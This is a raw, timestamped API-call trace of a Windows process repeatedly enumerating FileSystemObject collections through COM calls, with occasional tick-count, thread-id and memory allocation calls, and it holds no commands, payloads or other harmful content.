	[0046.796] FileSystemObject:IUnknown:QueryInterface (in: This=0x42eb60, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0046.796] FileSystemObject:IUnknown:QueryInterface (in: This=0x42eb60, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x42eb60) returned 0x0
	[0046.796] FileSystemObject:IUnknown:Release (This=0x42eb60) returned 0x1
	[0046.796] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.798] FileSystemObject:IUnknown:Release (This=0x42eb60) returned 0x0
	[0046.799] FileSystemObject:IUnknown:QueryInterface (in: This=0x42eb60, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0046.799] FileSystemObject:IUnknown:QueryInterface (in: This=0x42eb60, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x42eb60) returned 0x0
	[0046.799] FileSystemObject:IUnknown:Release (This=0x42eb60) returned 0x1
	[0046.799] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.802] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebf8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.803] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ed28, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.804] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebf8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.805] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ed28, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.805] FileSystemObject:IUnknown:Release (This=0x42eb60) returned 0x0
	[0046.805] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e730, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.812] FileSystemObject:IUnknown:QueryInterface (in: This=0x42eb60, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0046.812] FileSystemObject:IUnknown:QueryInterface (in: This=0x42eb60, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x42eb60) returned 0x0
	[0046.812] FileSystemObject:IUnknown:Release (This=0x42eb60) returned 0x1
	[0046.812] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.814] FileSystemObject:IUnknown:Release (This=0x42eb60) returned 0x0
	[0046.815] FileSystemObject:IUnknown:QueryInterface (in: This=0x42eb60, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0046.815] FileSystemObject:IUnknown:QueryInterface (in: This=0x42eb60, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x42eb60) returned 0x0
	[0046.815] FileSystemObject:IUnknown:Release (This=0x42eb60) returned 0x1
	[0046.815] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.817] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebf8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.817] GetTickCount () returned 0x1144f87
	[0046.818] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ed18, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.819] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebf8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.823] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42eef8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.823] FileSystemObject:IUnknown:Release (This=0x42eb60) returned 0x0
	[0046.823] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e730, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.827] FileSystemObject:IUnknown:QueryInterface (in: This=0x42eb60, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0046.828] FileSystemObject:IUnknown:QueryInterface (in: This=0x42eb60, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x42eb60) returned 0x0
	[0046.828] FileSystemObject:IUnknown:Release (This=0x42eb60) returned 0x1
	[0046.828] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.828] FileSystemObject:IUnknown:Release (This=0x42eb60) returned 0x0
	[0046.829] FileSystemObject:IUnknown:QueryInterface (in: This=0x42eb60, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0046.829] FileSystemObject:IUnknown:QueryInterface (in: This=0x42eb60, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x42eb60) returned 0x0
	[0046.829] FileSystemObject:IUnknown:Release (This=0x42eb60) returned 0x1
	[0046.829] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.830] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebf8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.831] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ed18, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.834] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebf8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.835] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ed18, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.835] FileSystemObject:IUnknown:Release (This=0x42eb60) returned 0x0
	[0046.835] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e730, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.837] GetTickCount () returned 0x1144f97
	[0046.842] FileSystemObject:IUnknown:QueryInterface (in: This=0x42eb60, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0046.842] FileSystemObject:IUnknown:QueryInterface (in: This=0x42eb60, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x42eb60) returned 0x0
	[0046.842] FileSystemObject:IUnknown:Release (This=0x42eb60) returned 0x1
	[0046.842] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.844] GetCurrentThreadId () returned 0x9a8
	[0046.844] GetCurrentThreadId () returned 0x9a8
	[0046.844] ??2@YAPEAX_K@Z () returned 0x42ec60
	[0046.844] malloc (_Size=0x80) returned 0x3c8550
	[0046.847] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ed60, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bba8 | out: ppvObject=0x26bba8*=0x0) returned 0x80004002
	[0046.847] FileSystemObject:IUnknown:QueryInterface (in: This=0x42ed60, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be10 | out: ppvObject=0x26be10*=0x42ed60) returned 0x0
	[0046.847] FileSystemObject:IUnknown:Release (This=0x42ed60) returned 0x1
	[0046.847] FileSystemObject:IEnumVARIANT:Next (in: This=0x42ed60, celt=0x1, rgvar=0x26bda8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.847] FileSystemObject:IUnknown:Release (This=0x42ed60) returned 0x0
	[0046.848] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bba8 | out: ppvObject=0x26bba8*=0x0) returned 0x80004002
	[0046.848] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be10 | out: ppvObject=0x26be10*=0x3ca310) returned 0x0
	[0046.848] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0046.848] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26bda8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.851] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26bda8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42edc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.852] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26bda8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42eef8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.853] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26bda8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42edc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.853] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0046.853] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.857] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bba8 | out: ppvObject=0x26bba8*=0x0) returned 0x80004002
	[0046.857] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be10 | out: ppvObject=0x26be10*=0x3ca310) returned 0x0
	[0046.857] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0046.857] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26bda8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.857] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0046.857] GetTickCount () returned 0x1144fa7
	[0046.858] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bba8 | out: ppvObject=0x26bba8*=0x0) returned 0x80004002
	[0046.858] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be10 | out: ppvObject=0x26be10*=0x3ca310) returned 0x0
	[0046.858] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0046.858] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26bda8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.860] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26bda8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebf8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.861] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26bda8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ef18, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.862] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26bda8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebf8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.862] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0046.862] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.865] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bba8 | out: ppvObject=0x26bba8*=0x0) returned 0x80004002
	[0046.865] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be10 | out: ppvObject=0x26be10*=0x3ca310) returned 0x0
	[0046.865] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0046.865] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26bda8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.865] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0046.866] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bba8 | out: ppvObject=0x26bba8*=0x0) returned 0x80004002
	[0046.866] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26be10 | out: ppvObject=0x26be10*=0x3ca310) returned 0x0
	[0046.866] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0046.866] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26bda8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.867] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26bda8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42edc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.869] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26bda8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42eef8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.870] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26bda8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42edc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.870] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0046.870] FileSystemObject:IEnumVARIANT:Next (in: This=0x42eb60, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.870] FileSystemObject:IUnknown:Release (This=0x42eb60) returned 0x0
	[0046.871] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0046.871] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x3ca310) returned 0x0
	[0046.871] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0046.871] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.872] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.873] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ee68, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.873] GetTickCount () returned 0x1144fb6
	[0046.874] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42edc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.874] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0046.874] free (_Block=0x3c8550) 
	[0046.874] free (_Block=0x3cd950) 
	[0046.874] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0046.874] ??3@YAXPEAX@Z () returned 0x3c3df301
	[0046.874] FileSystemObject:IEnumVARIANT:Next (in: This=0x42e730, celt=0x1, rgvar=0x26cc48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x42c100, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.880] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0046.880] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x3ca310) returned 0x0
	[0046.880] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0046.880] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x1
	[0046.882] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x0
	[0046.882] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914ccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c2f8 | out: ppvObject=0x26c2f8*=0x0) returned 0x80004002
	[0046.882] FileSystemObject:IUnknown:QueryInterface (in: This=0x3ca310, riid=0x7fef914f580*(Data1=0x20404, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c560 | out: ppvObject=0x26c560*=0x3ca310) returned 0x0
	[0046.882] FileSystemObject:IUnknown:Release (This=0x3ca310) returned 0x1
	[0046.883] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.884] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ebc8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
	[0046.885] FileSystemObject:IEnumVARIANT:Next (in: This=0x3ca310, celt=0x1, rgvar=0x26c4f8*(varType=0x0, wReserved1=0x26, wReserved2=0x0, wReserved3=0x0, varVal1=0x42ecf8, varVal2=0x0), pceltFetched=0x0 | out: pceltFetched=0x0) returned 0x0
